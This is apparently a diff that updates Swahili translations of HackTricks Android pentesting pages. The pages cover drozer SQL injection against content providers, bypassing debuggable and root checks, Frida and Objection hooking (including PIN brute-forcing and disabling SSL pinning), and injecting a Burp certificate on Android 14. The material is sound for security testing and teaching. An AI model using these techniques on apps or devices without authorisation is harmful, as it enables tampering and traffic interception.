Wakati wa kuuliza Mtoa Maudhui kuna hoja 2 za kuvutia kutafuta taarifa: _--selection_ na _--projection_:
![](<../../../images/image (784).png>)
Unaweza kujaribu **kudhulumu** hizi **parameters** ili kujaribu **SQL injections**:
Unaweza kujaribu **kudhulumu** hizi **parameta** ili kujaribu **SQL injections**:
```
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
@ -147,7 +147,7 @@ android_metadata
notes
sqlite_sequence
```
## **Watoa Maudhui Wanaoungwa Mkono na Mfumo wa Faili**
## **Watoa Maudhui Wanaoungwa na Mfumo wa Faili**
Watoa maudhui wanaweza pia kutumika **kupata faili:**

60
src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md
View File

@ -1,89 +1,89 @@
# Kutumia programu inayoweza kudhibitiwa
# Exploiting a debuggeable application
{{#include ../../banners/hacktricks-training.md}}
# **Kupita vizuizi vya root na vya kudhibitiwa**
# **Bypassing root and debuggeable checks**
Sehemu hii ya chapisho ni muhtasari kutoka kwa chapisho [**https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0**](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0)
## Hatua za Kufanya Programu ya Android Iweze Kudhibitiwa na Kupita Vizuizi
## Steps to Make an Android App Debuggable and Bypass Checks
### **Kufanya Programu Iweze Kudhibitiwa**
### **Making the App Debuggable**
Maudhui yanategemea https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0
1. **Decompile APK:**
1. **Decompile the APK:**
- Tumia zana ya APK-GUI kwa ajili ya decompiling APK.
- Katika faili _android-manifest_, weka `android:debuggable=true` ili kuwezesha hali ya kudhibiti.
- Katika faili _android-manifest_, weka `android:debuggable=true` ili kuwezesha hali ya debugging.
- Recompile, sign, na zipalign programu iliyobadilishwa.
2. **Sakinisha Programu Iliyobadilishwa:**
2. **Install the Modified Application:**
- Tumia amri: `adb install <application_name>`.
3. **Pata Jina la Kifurushi:**
3. **Retrieve the Package Name:**
- Tekeleza `adb shell pm list packages 3` ili orodhesha programu za wahusika wengine na kupata jina la kifurushi.
4. **Weka Programu Kusubiri Muunganisho wa Debugger:**
4. **Set the App to Await Debugger Connection:**
- Amri: `adb shell am setup-debug-app w <package_name>`.
- **Kumbuka:** Amri hii lazima ifanywe kila wakati kabla ya kuanzisha programu ili kuhakikisha inasubiri debugger.
- Kwa kudumu, tumia `adb shell am setup-debug-app w -persistent <package_name>`.
- Kuondoa bendera zote, tumia `adb shell am clear-debug-app <package_name>`.
5. **Jiandae kwa Debugging katika Android Studio:**
5. **Prepare for Debugging in Android Studio:**
- Tembea katika Android Studio hadi _File -> Open Profile or APK_.
- Fungua APK iliyorekebishwa.
6. **Weka Breakpoints katika Faili Muhimu za Java:**
6. **Set Breakpoints in Key Java Files:**
- Weka breakpoints katika `MainActivity.java` (hasa katika njia ya `onCreate`), `b.java`, na `ContextWrapper.java`.
### **Kupita Vizuizi**
### **Bypassing Checks**
Programu, katika hatua fulani, itathibitisha ikiwa inaweza kudhibitiwa na pia itakagua binaries zinazoashiria kifaa kilichoshikiliwa. Debugger inaweza kutumika kubadilisha taarifa za programu, kuondoa kipande cha kudhibiti, na kubadilisha majina ya binaries yanayotafutwa ili kupita vizuizi hivi.
Programu, katika hatua fulani, itathibitisha ikiwa inapatikana kwa debugging na pia itakagua binaries zinazoashiria kifaa kilichoshikiliwa. Debugger inaweza kutumika kubadilisha taarifa za programu, kuondoa kipande cha debuggable, na kubadilisha majina ya binaries zinazotafutwa ili kupita hizi checks.
Kwa ajili ya ukaguzi wa kudhibitiwa:
Kwa ajili ya ukaguzi wa debuggable:
1. **Badilisha Mipangilio ya Bendera:**
1. **Modify Flag Settings:**
- Katika sehemu ya mabadiliko ya debugger console, tembea hadi: `this mLoadedAPK -> mApplicationInfo -> flags = 814267974`.
- **Kumbuka:** Uwakilishi wa binary wa `flags = 814267974` ni `11000011100111011110`, unaonyesha kuwa "Flag_debuggable" inafanya kazi.
![https://miro.medium.com/v2/resize:fit:1400/1*-ckiSbWGSoc1beuxxpKbow.png](https://miro.medium.com/v2/resize:fit:1400/1*-ckiSbWGSoc1beuxxpKbow.png)
Hatua hizi kwa pamoja zinahakikisha kuwa programu inaweza kudhibitiwa na kwamba vizuizi fulani vya usalama vinaweza kupitishwa kwa kutumia debugger, kuruhusu uchambuzi wa kina au mabadiliko ya tabia ya programu.
Hatua hizi kwa pamoja zinahakikisha kuwa programu inaweza kudebugiwa na kwamba ukaguzi fulani wa usalama unaweza kupitishwa kwa kutumia debugger, ikiruhusu uchambuzi wa kina au mabadiliko ya tabia ya programu.
Hatua ya 2 inahusisha kubadilisha thamani ya bendera kuwa 814267972, ambayo inawakilishwa kwa binary kama 110000101101000000100010100.
# **Kutumia Uthibitisho**
# **Exploiting a Vulnerability**
Uonyeshaji ulitolewa kwa kutumia programu yenye udhaifu inayojumuisha kitufe na textview. Kwanza, programu inaonyesha "Crack Me". Lengo ni kubadilisha ujumbe kutoka "Try Again" hadi "Hacked" wakati wa utendaji, bila kubadilisha msimbo wa chanzo.
Uonyeshaji ulitolewa kwa kutumia programu yenye udhaifu inayokuwa na kitufe na textview. Kwanza, programu inaonyesha "Crack Me". Lengo ni kubadilisha ujumbe kutoka "Try Again" hadi "Hacked" wakati wa utendaji, bila kubadilisha msimbo wa chanzo.
## **Kuangalia Uthibitisho**
## **Checking for Vulnerability**
- Programu ilidecompiled kwa kutumia `apktool` ili kufikia faili `AndroidManifest.xml`.
- Uwepo wa `android_debuggable="true"` katika AndroidManifest.xml unaonyesha kuwa programu inaweza kudhibitiwa na inahatarishwa kwa matumizi mabaya.
- Inafaa kutambua kuwa `apktool` inatumika pekee kuangalia hali ya kudhibitiwa bila kubadilisha msimbo wowote.
- Uwepo wa `android_debuggable="true"` katika AndroidManifest.xml unaonyesha kuwa programu inapatikana kwa debugging na inahatarishwa kwa unyakuzi.
- Inafaa kutambua kuwa `apktool` inatumika pekee kuangalia hali ya debuggable bila kubadilisha msimbo wowote.
## **Kuandaa Mipangilio**
## **Preparing the Setup**
- Mchakato ulijumuisha kuanzisha emulator, kusakinisha programu yenye udhaifu, na kutumia `adb jdwp` ili kubaini bandari za Dalvik VM zinazot listening.
- JDWP (Java Debug Wire Protocol) inaruhusu kudhibiti programu inayotembea katika VM kwa kufichua bandari ya kipekee.
- Kuelekeza bandari ilikuwa muhimu kwa ajili ya kudhibiti kwa mbali, ikifuatiwa na kuunganisha JDB kwenye programu lengwa.
- Mchakato ulijumuisha kuanzisha emulator, kufunga programu yenye udhaifu, na kutumia `adb jdwp` ili kubaini bandari za Dalvik VM zinazotafutwa.
- JDWP (Java Debug Wire Protocol) inaruhusu debugging ya programu inayotembea katika VM kwa kufichua bandari ya kipekee.
- Kuelekeza bandari ilikuwa muhimu kwa ajili ya debugging ya mbali, ikifuatiwa na kuunganisha JDB kwenye programu lengwa.
## **Kuingiza Msimbo Wakati wa Utendaji**
## **Injecting Code at Runtime**
- Uthibitisho ulifanywa kwa kuweka breakpoints na kudhibiti mtiririko wa programu.
- Unyakuzi ulifanywa kwa kuweka breakpoints na kudhibiti mtiririko wa programu.
- Amri kama `classes` na `methods <class_name>` zilitumika kufichua muundo wa programu.
- Breakpoint iliwekwa katika njia ya `onClick`, na utekelezaji wake ulidhibitiwa.
- Breakpoint ilipangwa katika njia ya `onClick`, na utekelezaji wake ulidhibitiwa.
- Amri za `locals`, `next`, na `set` zilitumika kukagua na kubadilisha mabadiliko ya ndani, hasa kubadilisha ujumbe wa "Try Again" kuwa "Hacked".
- Msimbo uliobadilishwa ulitekelezwa kwa kutumia amri ya `run`, kwa mafanikio kubadilisha matokeo ya programu kwa wakati halisi.
Mfano huu ulionyesha jinsi tabia ya programu inayoweza kudhibitiwa inaweza kubadilishwa, ikionyesha uwezekano wa matumizi mabaya zaidi kama kupata ufikiaji wa shell kwenye kifaa katika muktadha wa programu.
Mfano huu ulionyesha jinsi tabia ya programu inayopatikana kwa debugging inaweza kudhibitiwa, ikionyesha uwezekano wa unyakuzi wa zaidi kama kupata ufikiaji wa shell kwenye kifaa katika muktadha wa programu.
## Marejeleo
## References
- [https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0)
- [https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications](https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications)

16
src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md
View File

@ -10,8 +10,8 @@ Sakinisha **frida tools**:
pip install frida-tools
pip install frida
```
**Pakua na sakinisha** katika android **frida server** ([Download the latest release](https://github.com/frida/frida/releases)).\
Mstari mmoja wa kuanzisha adb katika hali ya mizizi, kuungana nayo, kupakia frida-server, kutoa ruhusa za kutekeleza na kuikimbia katika hali ya nyuma:
**Pakua na usakinishe** kwenye android **frida server** ([Download the latest release](https://github.com/frida/frida/releases)).\
Mstari mmoja wa kuanzisha adb katika hali ya mizizi, kuungana nayo, kupakia frida-server, kutoa ruhusa za utekelezaji na kuikimbia katika hali ya nyuma:
```bash
adb root; adb connect localhost:6000; sleep 1; adb push frida-server /data/local/tmp/; adb shell "chmod 755 /data/local/tmp/frida-server"; adb shell "/data/local/tmp/frida-server &"
```
@ -44,7 +44,7 @@ frida-ps -U | grep -i <part_of_the_package_name> #Get all the package name
**Fuata [kiungo kusoma](owaspuncrackable-1.md).**
**Unaweza kupata skripti za Frida za ajabu zaidi hapa:** [**https://codeshare.frida.re/**](https://codeshare.frida.re)
**Unaweza kupata scripts za Frida za ajabu zaidi hapa:** [**https://codeshare.frida.re/**](https://codeshare.frida.re)
## Mifano ya Haraka
@ -115,9 +115,9 @@ send("Activity HIT!!!")
var ret = this.onCreate.overload("android.os.Bundle").call(this, var_0)
}
```
### Kuunganisha kazi na vigezo na kupata thamani
### Kuingiza kazi na vigezo na kupata thamani
Kuunganisha kazi ya kufungua. Chapisha ingizo, itisha kazi ya asili kufungua ingizo na hatimaye, chapisha data safi:
Kuingiza kazi ya kufungua. Chapisha ingizo, itisha kazi ya asili kufungua ingizo na hatimaye, chapisha data safi:
```javascript
function getString(data) {
var ret = ""
@ -142,9 +142,9 @@ send("Decrypted flag: " + flag)
return ret //[B
}
```
### Kuingiza kazi na kuziita kwa ingizo letu
### Kuingiza kazi na kuziita kwa pembejeo zetu
Kuingiza kazi inayopokea mfuatano wa herufi na kuikalia kwa mfuatano mwingine (kutoka [hapa](https://11x256.github.io/Frida-hooking-android-part-2/))
Kuingiza kazi inayopokea mfuatano wa herufi na kuziita kwa mfuatano mwingine wa herufi (kutoka [hapa](https://11x256.github.io/Frida-hooking-android-part-2/))
```javascript
var string_class = Java.use("java.lang.String") // get a JS wrapper for java's String class
@ -161,7 +161,7 @@ return ret
Ikiwa unataka kutoa sifa fulani ya kitu kilichoundwa unaweza kutumia hii.
Katika mfano huu utaona jinsi ya kupata kitu cha darasa my_activity na jinsi ya kuita kazi .secret() ambayo itachapisha sifa ya faragha ya kitu:
Katika mfano huu utaona jinsi ya kupata kitu cha darasa my_activity na jinsi ya kuita kazi .secret() ambayo itachapisha sifa ya faragha ya kitu hicho:
```javascript
Java.choose("com.example.a11x256.frida_test.my_activity", {
onMatch: function (instance) {

8
src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md
View File

@ -53,9 +53,9 @@ Tazama: Kazi inapata kama parameter String, je, si lazima overload?
## Hook 2 - Function Bruteforce
### Non-Static Function
### Kazi Isiyo ya Kawaida
Ikiwa unataka kuita kazi isiyo ya static ya darasa, **kwanza unahitaji mfano** wa darasa hilo. Kisha, unaweza kutumia mfano huo kuita kazi hiyo.\
Ikiwa unataka kuita kazi isiyo ya kawaida ya darasa, **kwanza unahitaji mfano** wa darasa hilo. Kisha, unaweza kutumia mfano huo kuita kazi hiyo.\
Ili kufanya hivyo, unaweza **kupata mfano uliopo** na kuutumia:
```javascript
Java.perform(function () {
@ -94,7 +94,7 @@ console.log("[ + ] Found correct PIN: " + i)
```
## Hook 3 - Kupata hoja na thamani ya kurudi
Unaweza kuunganisha kazi na kufanya iwe **chapishe** thamani ya **hoja zilizopitishwa** na thamani ya **thamani ya kurudi:**
Unaweza kuunganisha kazi na kufanya iwe **chapishe** thamani ya **hoja zilizopitishwa** na thamani ya **kurudi:**
```javascript
//hook3.js
Java.perform(function () {
@ -114,7 +114,7 @@ return encrypted_ret
```
## Muhimu
Katika tutorial hii umeshikilia mbinu kwa kutumia jina la mbinu na _.implementation_. Lakini ikiwa kuna **mbinu zaidi ya moja** zenye jina sawa, utahitaji **kueleza mbinu** unayotaka kushikilia **ukionyesha aina ya hoja**.
Katika tutorial hii umeshikilia mbinu ukitumia jina la mbinu na _.implementation_. Lakini kama kuna **mbinu zaidi ya moja** zenye jina sawa, utahitaji **kueleza mbinu** unayotaka kushikilia **ukionyesha aina ya hoja**.
Unaweza kuona hilo katika [tutorial inayofuata](frida-tutorial-2.md).

8
src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md
View File

@ -11,7 +11,7 @@ Sehemu ya 1 ni rahisi sana.
## Sehemu ya 2
Hapa unaweza kuona mfano wa jinsi ya **kuhook kazi 2 zenye jina sawa** lakini parameta tofauti.\
Hapa unaweza kuona mfano wa jinsi ya **kuhook kazi 2 zenye jina moja** lakini parameta tofauti.\
Pia, utaweza kujifunza jinsi ya **kuita kazi kwa parameta zako mwenyewe**.\
Na hatimaye, kuna mfano wa jinsi ya **kupata mfano wa darasa na kufanya liite kazi**.
```javascript
@ -48,7 +48,7 @@ onComplete: function () { }
});
});
```
Unaweza kuona kwamba ili kuunda String kwanza imeelekeza kwenye darasa _java.lang.String_ na kisha imeunda kitu _$new_ cha darasa hilo chenye String kama maudhui. Hii ndiyo njia sahihi ya kuunda kitu kipya cha darasa. Lakini, katika kesi hii, unaweza tu kupitisha kwa `this.fun()` String yoyote kama: `this.fun("hey there!")`
Unaweza kuona kwamba ili kuunda String kwanza imeelekeza kwenye darasa _java.lang.String_ na kisha imeunda kitu _$new_ cha darasa hilo chenye String kama maudhui. Hii ndiyo njia sahihi ya kuunda kitu kipya cha darasa. Lakini, katika kesi hii, unaweza tu kupitisha `this.fun()` String yoyote kama: `this.fun("hey there!")`
### Python
```python
@ -106,7 +106,7 @@ script.exports.callsecretfunction()
elif command == "3":
script.exports.hooksecretfunction()
```
Amri "**1**" itatoa, amri "**2**" itapata na **mfano wa darasa na kuita kazi ya faragha** _**secret()**_ na amri "**3**" it **hook** kazi _**secret()**_ ili **irejeshe** **nyota tofauti**.
Amri "**1**" itatoa, amri "**2**" itapata na **mfano wa darasa na kuita kazi ya faragha** _**secret()**_ na amri "**3**" itachomeka kazi _**secret()**_ ili **irejeshe** _**nyuzi tofauti**_.
Hivyo, ukitaja "**2**" utapata **siri halisi**, lakini ukitaja "**3**" kisha "**2**" utapata **siri bandia**.
@ -202,7 +202,7 @@ return this.setText(string_to_recv)
}
})
```
Kuna sehemu ya 5 ambayo sitafafanua kwa sababu hakuna kitu kipya. Lakini ikiwa unataka kuisoma iko hapa: [https://11x256.github.io/Frida-hooking-android-part-5/](https://11x256.github.io/Frida-hooking-android-part-5/)
Kuna sehemu ya 5 ambayo sitafafanua kwa sababu hakuna kitu kipya. Lakini ikiwa unataka kusoma, iko hapa: [https://11x256.github.io/Frida-hooking-android-part-5/](https://11x256.github.io/Frida-hooking-android-part-5/)
{{#include ../../../banners/hacktricks-training.md}}

16
src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md
View File

@ -10,7 +10,7 @@
[**Objection**](https://github.com/sensepost/objection) ni zana ya utafiti wa simu kwa wakati halisi, inayotolewa na [Frida](https://www.frida.re). Ilijengwa kwa lengo la kusaidia kutathmini programu za simu na hali yao ya usalama bila haja ya kifaa cha simu kilichovunjwa au kilichoshikiliwa.
**Kumbuka:** Hii si aina yoyote ya kukwepa jailbreak / root. Kwa kutumia `objection`, bado unakabiliwa na vizuizi vyote vilivyowekwa na sandbox inayohusika.
**Kumbuka:** Hii si aina yoyote ya kukwepa jailbreak / root. Kwa kutumia `objection`, bado unakabiliwa na vizuizi vyote vilivyowekwa na sandbox inayohusika unayokutana nayo.
### Muhtasari
@ -18,7 +18,7 @@
## Tutorial
Kwa ajili ya tutorial hii, nitatumia APK ambayo unaweza kupakua hapa:
Kwa ajili ya tutorial hii nitatumia APK ambayo unaweza kupakua hapa:
{% file src="../../../images/app-release.zip" %}
@ -30,7 +30,7 @@ pip3 install objection
```
### Connection
Fanya **muunganisho wa kawaida wa ADB** na **anzisha** seva ya **frida** kwenye kifaa (na hakikisha kwamba frida inafanya kazi kwenye mteja na seva).
Fanya **muunganisho wa kawaida wa ADB** na **anzisha** seva ya **frida** kwenye kifaa (na hakikisha frida inafanya kazi kwenye mteja na seva).
Ikiwa unatumia **kifaa kilichopandishwa mizizi**, inahitajika kuchagua programu unayotaka kupima ndani ya chaguo la _**--gadget**_. katika kesi hii:
```bash
@ -73,7 +73,7 @@ android sslpinning disable #Attempts to disable SSL Pinning on Android devices.
android root disable #Attempts to disable root detection on Android devices.
android root simulate #Attempts to simulate a rooted Android environment.
```
#### Exec Command
#### Amri ya Exec
```bash
android shell_exec whoami
```
@ -97,7 +97,7 @@ android hooking list activities
android hooking list services
android hooking list receivers
```
Frida itazindua kosa ikiwa hakuna inapatikana
Frida itatoa kosa ikiwa hakuna inapatikana
#### Kupata shughuli ya sasa
```bash
@ -159,7 +159,7 @@ Ikiwa unacheza na programu wakati darasa limeunganishwa utaona wakati **kila kaz
#### Kubadilisha thamani ya kurudi ya boolean ya kazi
Kutoka kwenye msimbo wa chanzo unaweza kuona kwamba kazi _checkPin_ inapata _String_ kama hoja na inarudisha _boolean_. Hebu tufanye kazi hiyo **irudishe daima true**:
Kutoka kwenye msimbo wa chanzo unaweza kuona kwamba kazi _checkPin_ inapata _String_ kama hoja na inarudisha _boolean_. Hebu tufanye kazi hiyo **imarudishe daima true**:
![](<../../../images/image (883).png>)
@ -169,7 +169,7 @@ Sasa, ikiwa utaandika chochote kwenye kisanduku cha maandiko kwa ajili ya PIN co
### Mifano ya darasa
Tafuta na uchapishe **mifano hai ya darasa maalum la Java**, lililoainishwa na jina kamili la darasa. Matokeo ni jaribio la kupata thamani ya string kwa kigezo kilichogunduliwa ambacho kwa kawaida **kitakuwa na thamani za mali za kitu**.
Tafuta na uchapishe **mifano hai za darasa maalum la Java**, lililoainishwa na jina kamili la darasa. Matokeo ni jaribio la kupata thamani ya mfuatano kwa kizuizi kilichogunduliwa ambacho kwa kawaida **kitakuwa na thamani za mali za kitu**.
```
android heap print_instances <class>
```
@ -225,6 +225,4 @@ exit
- Huwezi kutumia mifano ya madarasa kuita kazi za mfano. Na huwezi kuunda mifano mipya ya madarasa na kuvitumia kuita kazi.
- Hakuna njia fupi (kama ile ya sslpinnin) ya kuhooki mbinu zote za kawaida za crypto zinazotumiwa na programu ili kuona maandiko yaliyofichwa, maandiko ya kawaida, funguo, IVs na algorithimu zinazotumiwa.
{{#include ../../../banners/hacktricks-training.md}}

4
src/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md
View File

@ -56,10 +56,10 @@ Njia ya nne ni kuongeza agizo la kuhamasisha thamani ya v9(1000000) kwa v0 _(thi
## Solution
Fanya programu ifanye mzunguko mara 100000 wakati unashinda mara ya kwanza. Ili kufanya hivyo, unahitaji tu kuunda mzunguko wa **:goto_6** na kufanya programu **ijump huko ikiwa `this.o`** haina thamani 100000:
Fanya programu ifanye mzunguko mara 100000 unaposhinda mara ya kwanza. Ili kufanya hivyo, unahitaji tu kuunda mzunguko wa **:goto_6** na kufanya programu **ijump huko ikiwa `this.o`** haina thamani 100000:
![](<../../images/image (1090).png>)
Unahitaji kufanya hivi ndani ya kifaa halisi kwani (sijui kwa nini) hii haifanyi kazi kwenye kifaa kilichotengenezwa.
Unahitaji kufanya hivi ndani ya kifaa halisi kwani (sijui kwa nini) hii haifanyi kazi kwenye kifaa kilichosimuliwa.
{{#include ../../banners/hacktricks-training.md}}

32
src/mobile-pentesting/android-app-pentesting/install-burp-certificate.md
View File

@ -9,7 +9,7 @@ Kwanza kabisa unahitaji kupakua cheti cha Der kutoka Burp. Unaweza kufanya hivyo
![](<../../images/image (367).png>)
**Export cheti katika muundo wa Der** na hebu **badilisha** kuwa mfumo ambao **Android** itaweza **kuelewa.** Kumbuka kwamba **ili kuunda cheti cha burp kwenye mashine ya Android katika AVD** unahitaji **kuendesha** mashine hii **ikiwa** na chaguo la **`-writable-system`**.\
**Export cheti katika muundo wa Der** na hebu **badilisha** kuwa fomu ambayo **Android** itaweza **kuelewa.** Kumbuka kwamba **ili kuunda cheti cha burp kwenye mashine ya Android katika AVD** unahitaji **kuendesha** mashine hii **ikiwa** na chaguo la **`-writable-system`**.\
Kwa mfano unaweza kuendesha kama:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9" -http-proxy 192.168.1.12:8080 -writable-system
@ -25,11 +25,11 @@ adb shell mv /sdcard/$CERTHASHNAME /system/etc/security/cacerts/ #Move to correc
adb shell chmod 644 /system/etc/security/cacerts/$CERTHASHNAME #Assign privileges
adb reboot #Now, reboot the machine
```
Mara tu **mashine itakapokamilisha kuanzisha upya**, cheti cha burp kitakuwa kinatumika!
Mara tu **mashine itakapokamilisha kuanzisha tena**, cheti cha burp kitakuwa kinatumika!
## Kutumia Magisc
Ikiwa umepata **root kwenye kifaa chako kwa kutumia Magisc** (labda emulators), na huwezi kufuata **hatua** zilizopita za kufunga cheti cha Burp kwa sababu **faili ya mfumo ni ya kusoma tu** na huwezi kuifunga tena kuwa ya kuandika, kuna njia nyingine.
Ikiwa umepata **root** kwenye kifaa chako kwa kutumia Magisc (labda emulators), na huwezi kufuata **hatua** za awali za kufunga cheti cha Burp kwa sababu **faili ya mfumo ni ya kusoma tu** na huwezi kuirejesha kuwa ya kuandika, kuna njia nyingine.
Imeelezwa katika [**hii video**](https://www.youtube.com/watch?v=qQicUW0svB8) unahitaji:
@ -41,23 +41,23 @@ Imeelezwa katika [**hii video**](https://www.youtube.com/watch?v=qQicUW0svB8) un
<figure><img src="../../images/image (54).png" alt="" width="334"><figcaption></figcaption></figure>
2. **Fanya iwe ya kuaminika kwa Mfumo**: Pakua moduli ya Magisc [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts) (faili .zip), **vuta na uachie** kwenye simu, nenda kwenye **app ya Magics** kwenye simu kwenye sehemu ya **`Modules`**, bonyeza **`Install from storage`**, chagua moduli ya `.zip` na mara baada ya kufunga **anzisha upya** simu:
2. **Fanya iwe ya kuaminika kwa Mfumo**: Pakua moduli ya Magisc [MagiskTrustUserCerts](https://github.com/NVISOsecurity/MagiskTrustUserCerts) (faili .zip), **vuta na uachie** kwenye simu, nenda kwenye **app ya Magics** kwenye simu kwenye sehemu ya **`Modules`**, bonyeza **`Install from storage`**, chagua moduli ya `.zip` na mara itakapokamilika **anzisha tena** simu:
<figure><img src="../../images/image (55).png" alt="" width="345"><figcaption></figcaption></figure>
- Baada ya kuanzisha upya, nenda kwenye `Trusted credentials` -> `SYSTEM` na hakikisha cheti cha Postswigger kiko hapo
- Baada ya kuanzisha tena, nenda kwenye `Trusted credentials` -> `SYSTEM` na hakikisha cheti cha Postswigger kiko hapo
<figure><img src="../../images/image (56).png" alt="" width="314"><figcaption></figcaption></figure>
## Baada ya Android 14
Katika toleo jipya la Android 14, mabadiliko makubwa yameonekana katika usimamizi wa cheti cha Mamlaka ya Cheti (CA) kinachokubaliwa na mfumo. Awali, vyeti hivi vilihifadhiwa katika **`/system/etc/security/cacerts/`**, vinavyoweza kufikiwa na kubadilishwa na watumiaji wenye ruhusa za root, ambayo iliruhusu matumizi ya haraka katika mfumo mzima. Hata hivyo, na Android 14, mahali pa kuhifadhiwa kumehamishwa kwenda **`/apex/com.android.conscrypt/cacerts`**, saraka ndani ya njia ya **`/apex`**, ambayo ni isiyoweza kubadilishwa kwa asili.
Katika toleo jipya la Android 14, mabadiliko makubwa yameonekana katika usimamizi wa cheti cha Mamlaka ya Cheti (CA) kinachokubalika na mfumo. Awali, vyeti hivi vilihifadhiwa katika **`/system/etc/security/cacerts/`**, vinavyoweza kufikiwa na kubadilishwa na watumiaji wenye ruhusa za root, ambayo iliruhusu matumizi ya haraka katika mfumo mzima. Hata hivyo, na Android 14, mahali pa kuhifadhiwa kumehamishwa kwenda **`/apex/com.android.conscrypt/cacerts`**, saraka ndani ya njia ya **`/apex`**, ambayo ni isiyoweza kubadilishwa kwa asili.
Jaribio la kufunga upya **APEX cacerts path** kuwa ya kuandika linakutana na kushindwa, kwani mfumo haukuruhusu operesheni kama hizo. Hata jaribio la kuondoa au kuweka saraka hiyo na mfumo wa muda (tmpfs) halipuuzi isiyoweza kubadilishwa; programu zinaendelea kufikia data ya cheti asilia bila kujali mabadiliko katika kiwango cha mfumo wa faili. Uthabiti huu unatokana na **`/apex`** kufungwa kwa usambazaji wa PRIVATE, kuhakikisha kwamba mabadiliko yoyote ndani ya saraka ya **`/apex`** hayaathiri michakato mingine.
Jaribio la kurejesha **APEX cacerts path** kuwa ya kuandika linakutana na kushindwa, kwani mfumo haukuruhusu operesheni kama hizo. Hata jaribio la kuondoa au kuweka saraka hiyo na mfumo wa muda (tmpfs) halipuuzi isiyoweza kubadilishwa; programu zinaendelea kufikia data ya cheti asilia bila kujali mabadiliko katika kiwango cha mfumo wa faili. Uthabiti huu unatokana na **`/apex`** kuunganishwa na kueneza PRIVATE, kuhakikisha kwamba mabadiliko yoyote ndani ya saraka ya **`/apex`** hayaathiri michakato mingine.
Kuanza kwa Android kunahusisha mchakato wa `init`, ambao, unapozindua mfumo wa uendeshaji, pia huanzisha mchakato wa Zygote. Mchakato huu unawajibika kwa kuzindua michakato ya programu na jina jipya la kufunga ambalo linajumuisha kufunga binafsi **`/apex`**, hivyo kuzuia mabadiliko katika saraka hii kutoka kwa michakato mingine.
Kuanza kwa Android kunahusisha mchakato wa `init`, ambao, unapozindua mfumo wa uendeshaji, pia huanzisha mchakato wa Zygote. Mchakato huu unawajibika kwa kuzindua michakato ya programu na jina jipya la kuunganishwa ambalo linajumuisha kuunganishwa binafsi la **`/apex`**, hivyo kuzuia mabadiliko katika saraka hii kutoka kwa michakato mingine.
Hata hivyo, kuna njia mbadala kwa wale wanaohitaji kubadilisha cheti cha CA kinachokubaliwa na mfumo ndani ya saraka ya **`/apex`**. Hii inahusisha kufunga upya **`/apex`** ili kuondoa usambazaji wa PRIVATE, hivyo kuifanya iwe ya kuandika. Mchakato huu unajumuisha nakala ya maudhui ya **`/apex/com.android.conscrypt`** kwenda mahali pengine, kuondoa saraka ya **`/apex/com.android.conscrypt`** ili kuondoa kizuizi cha kusoma tu, na kisha kurejesha maudhui kwenye mahali pake pa asili ndani ya **`/apex`**. Njia hii inahitaji hatua za haraka ili kuepuka kuanguka kwa mfumo. Ili kuhakikisha matumizi ya mabadiliko haya katika mfumo mzima, inapendekezwa kuanzisha upya `system_server`, ambayo kwa ufanisi inaanzisha upya programu zote na kuleta mfumo katika hali thabiti.
Hata hivyo, kuna njia mbadala kwa wale wanaohitaji kubadilisha vyeti vya CA vinavyokubalika na mfumo ndani ya saraka ya **`/apex`**. Hii inahusisha kurejesha kwa mikono **`/apex`** ili kuondoa kueneza PRIVATE, hivyo kuifanya iwe ya kuandika. Mchakato huu unajumuisha nakala ya maudhui ya **`/apex/com.android.conscrypt`** kwenda mahali pengine, kuondoa saraka ya **`/apex/com.android.conscrypt`** ili kuondoa kizuizi cha kusoma tu, na kisha kurejesha maudhui kwenye mahali pake pa asili ndani ya **`/apex`**. Njia hii inahitaji hatua za haraka ili kuepuka kuanguka kwa mfumo. Ili kuhakikisha matumizi ya mabadiliko haya katika mfumo mzima, inapendekezwa kuanzisha tena `system_server`, ambayo kwa ufanisi inaanzisha tena programu zote na kuleta mfumo katika hali thabiti.
```bash
# Create a separate temp directory, to hold the current certificates
# Otherwise, when we add the mount we can't read the current certs anymore.
@ -117,24 +117,24 @@ echo "System certificate injected"
```
### Bind-mounting through NSEnter
1. **Kuweka Saraka Inayoweza Kuandikwa**: Kwanza, saraka inayoweza kuandikwa inaanzishwa kwa kuunganisha `tmpfs` juu ya saraka ya cheti ya mfumo isiyo ya APEX iliyopo. Hii inafanywa kwa amri ifuatayo:
1. **Kuweka Saraka Inayoweza Kuandikwa**: Kwanza, saraka inayoweza kuandikwa inaanzishwa kwa kufunga `tmpfs` juu ya saraka ya cheti ya mfumo isiyo ya APEX iliyopo. Hii inafanywa kwa amri ifuatayo:
```bash
mount -t tmpfs tmpfs /system/etc/security/cacerts
```
2. **Kuandaa Vyeti vya CA**: Baada ya kuweka saraka inayoweza kuandikwa, vyeti vya CA ambavyo mtu anakusudia kutumia vinapaswa kunakiliwa kwenye saraka hii. Hii inaweza kujumuisha kunakili vyeti vya kawaida kutoka `/apex/com.android.conscrypt/cacerts/`. Ni muhimu kurekebisha ruhusa na lebo za SELinux za vyeti hivi ipasavyo.
